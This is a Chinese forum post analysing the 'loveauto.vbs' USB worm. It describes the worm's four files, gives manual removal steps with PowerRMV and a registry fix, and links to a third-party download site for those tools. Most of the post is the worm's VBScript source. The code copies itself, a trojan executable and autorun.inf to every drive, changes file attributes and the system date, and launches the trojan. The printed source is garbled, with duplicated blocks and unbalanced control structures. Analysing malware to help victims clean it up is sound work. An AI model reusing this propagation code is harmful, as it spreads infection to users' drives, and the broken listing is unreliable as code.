loveauto.vbs之U盘小毒``
汗汗的``VB写的``样本来至卡卡社区``
有点头疼,没相关经验的网友可能不会处理``
"病毒"4个文件组成:
loveauto.vbs \\这个用来遍历释放Autorun.inf和栲贝自身,由WScript.exe激活。和修改日期等。
loveauto.reg \\破坏“隐藏文件选项”的
loveauto.bat \\附加这4个“病毒”属性的,为只读、隐藏、系统、存档
limt.exe \\按病毒原码看会生成,不能验证。
没有运行病毒哈``按病毒原码分析的,看下解决方法:
首先打开任务管理器,如果有看到CMD进程的话先结束掉。
[url]http://free.ys168.com/?gudugengkekao[/url]下载
PowerRMV和
显示隐藏文件.reg(注册表)。
运行,填入:
C:\loveauto.vbs
C:\loveauto.reg
C:\loveauto.bat
C:\limt.exe
C:\autorun.inf
有几个分区,把"C"改成相应的盘符就可以了.
例如:
D:\loveauto.vbs
D:\autorun.inf
选上抑止杀灭对象再次生成,然后杀灭,然后有个提示,确定就可以了。(找不到的忽略``)
按F3全盘查找,选上"包括隐藏文件",上面4个病毒名为关键字查找,有找到的话全部删除。
做完上面的,把注册表导入``如果系统日期被修改的话,自己手动改回来。
另:遇到盘打不开的,用PowerRMV填入:
D:\autorun.inf
E:\autorun.inf
F:\autorun.inf
一次一个,记得选上抑制对象生成,确定。
附上loveauto.vbs原码:
on error resume next
Set WshShell =CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1) '得到特殊目录dir
Set WshShell =CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1) '得到特殊目录dir
if WScript.ScriptFullName="C:\loveauto.vbs" or WScript.ScriptFullName="D:\loveauto.vbs" or
WScript.ScriptFullName="E:\loveauto.vbs" or WScript.ScriptFullName="F:\loveauto.vbs" or
WScript.ScriptFullName="G:\loveauto.vbs" or WScript.ScriptFullName="H:\loveauto.vbs" or
WScript.ScriptFullName="I:\loveauto.vbs" or WScript.ScriptFullName="J:\loveauto.vbs" or
WScript.ScriptFullName="K:\loveauto.vbs" or WScript.ScriptFullName="L:\loveauto.vbs" or
WScript.ScriptFullName="M:\loveauto.vbs" or WScript.ScriptFullName="N:\loveauto.vbs" or
WScript.ScriptFullName="O:\loveauto.vbs" or WScript.ScriptFullName="P:\loveauto.vbs" or
WScript.ScriptFullName="Q:\loveauto.vbs" or WScript.ScriptFullName="R:\loveauto.vbs" or
WScript.ScriptFullName="S:\loveauto.vbs" or WScript.ScriptFullName="T:\loveauto.vbs" or
WScript.ScriptFullName="U:\loveauto.vbs" or WScript.ScriptFullName="V:\loveauto.vbs" or
WScript.ScriptFullName="W:\loveauto.vbs" or WScript.ScriptFullName="X:\loveauto.vbs" or
WScript.ScriptFullName="Y:\loveauto.vbs" or WScript.ScriptFullName="Z:\loveauto.vbs" then
a=WshShell.Run("loveauto.bat open" ,0,False)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
a=WshShell.Run("loveauto.bat open" ,0,False)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
If objFSO.FileExists(dir&"\loveauto.vbs") Then '判断系统是否已经被感染
wscript.sleep 10
else
a=WshShell.Run("loveauto.bat - "&dir ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile "loveauto.bat",dir&"\",True '如果未被感染 则复制文件
Of.CopyFile "limt.exe",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
Of.CopyFile "loveauto.reg",dir&"\",True
Of.CopyFile "loveauto.vbs",dir&"\",True
a=WshShell.Run("loveauto.bat + "&dir ,0,True)
a=WshShell.Run("loveauto.bat date " ,0,True) '修改时间
WScript.Sleep 15000
a=WshShell.Run("limt.exe" ,0,False) '运行木马
a=WshShell.Run("loveauto.bat hfd " ,0,False) '恢复时间
For i=1 to 2
Set dc = Of.Drives '得到所有驱动器
For Each d In dc '遍历所有盘符并复制自我
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("loveauto.bat - "&d ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile dir&"\loveauto.bat",d&"\",True
Of.CopyFile dir&"\limt.exe",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\loveauto.reg",d&"\",True
Of.CopyFile dir&"\loveauto.vbs",d&"\",True
a=WshShell.Run("loveauto.bat + "&d ,0,True)
end if
wscript.sleep 2000
next
wscript.sleep 50000
i=0
next
end if
else
If objFSO.FileExists(dir&"\loveauto.vbs") Then
For i=1 to 2
Set dc = Of.Drives '得到所有驱动器
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("loveauto.bat - "&d ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile dir&"\loveauto.bat",d&"\",True
Of.CopyFile dir&"\limt.exe",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\loveauto.reg",d&"\",True
Of.CopyFile dir&"\loveauto.vbs",d&"\",True
a=WshShell.Run("loveauto.bat + "&d ,0,True)
end if
wscript.sleep 2000
next
wscript.sleep 50000
i=0
next
end if
else
If objFSO.FileExists(dir&"\loveauto.vbs") Then
For i=1 to 2
Set dc = Of.Drives '得到所有驱动器
For Each d In dc '遍历所有盘符并复制自我
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("loveauto.bat - "&d ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile dir&"\loveauto.bat",d&"\",True
Of.CopyFile dir&"\limt.exe",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\loveauto.reg",d&"\",True
Of.CopyFile dir&"\loveauto.vbs",d&"\",True
a=WshShell.Run("loveauto.bat + "&d ,0,True)
end if
wscript.sleep 2000
next
wscript.sleep 50000
i=0
next
else
a=WshShell.Run("loveauto.bat date " ,0,True) '修改时间
WScript.Sleep 15000
a=WshShell.Run("limt.exe" ,0,False) '运行木马
a=WshShell.Run("loveauto.bat hfd " ,0,False) '恢复时间
a=WshShell.Run("loveauto.bat - "&dir ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile "loveauto.bat",dir&"\",True '如果未被感染 则复制文件
Of.CopyFile "limt.exe",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
Of.CopyFile "loveauto.reg",dir&"\",True
Of.CopyFile "loveauto.vbs",dir&"\",True
a=WshShell.Run("loveauto.bat + "&dir ,0,True)
For i=1 to 2
Set dc = Of.Drives '得到所有驱动器
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("loveauto.bat - "&d ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile dir&"\loveauto.bat",d&"\",True
Of.CopyFile dir&"\limt.exe",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\loveauto.reg",d&"\",True
Of.CopyFile dir&"\loveauto.vbs",d&"\",True
a=WshShell.Run("loveauto.bat + "&d ,0,True)
end if
wscript.sleep 2000
next
wscript.sleep 50000
i=0
next
else
a=WshShell.Run("loveauto.bat date " ,0,True) '修改时间
WScript.Sleep 15000
a=WshShell.Run("limt.exe" ,0,False) '运行木马
a=WshShell.Run("loveauto.bat hfd " ,0,False) '恢复时间
a=WshShell.Run("loveauto.bat - "&dir ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile "loveauto.bat",dir&"\",True '如果未被感染 则复制文件
Of.CopyFile "limt.exe",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
Of.CopyFile "loveauto.reg",dir&"\",True
Of.CopyFile "loveauto.vbs",dir&"\",True
a=WshShell.Run("loveauto.bat + "&dir ,0,True)
For i=1 to 2
Set dc = Of.Drives '得到所有驱动器
For Each d In dc '遍历所有盘符并复制自我
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("loveauto.bat - "&d ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile "loveauto.bat",d&"\",True
Of.CopyFile "limt.exe",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
Of.CopyFile "loveauto.reg",d&"\",True
Of.CopyFile "loveauto.vbs",d&"\",True
a=WshShell.Run("loveauto.bat + "&d ,0,True)
end if
wscript.sleep 2000
next
wscript.sleep 50000
i=0
next
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("loveauto.bat - "&d ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile "loveauto.bat",d&"\",True
Of.CopyFile "limt.exe",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
Of.CopyFile "loveauto.reg",d&"\",True
Of.CopyFile "loveauto.vbs",d&"\",True
a=WshShell.Run("loveauto.bat + "&d ,0,True)
end if
wscript.sleep 2000
next
wscript.sleep 50000
i=0
next
end if
end if
一些图:
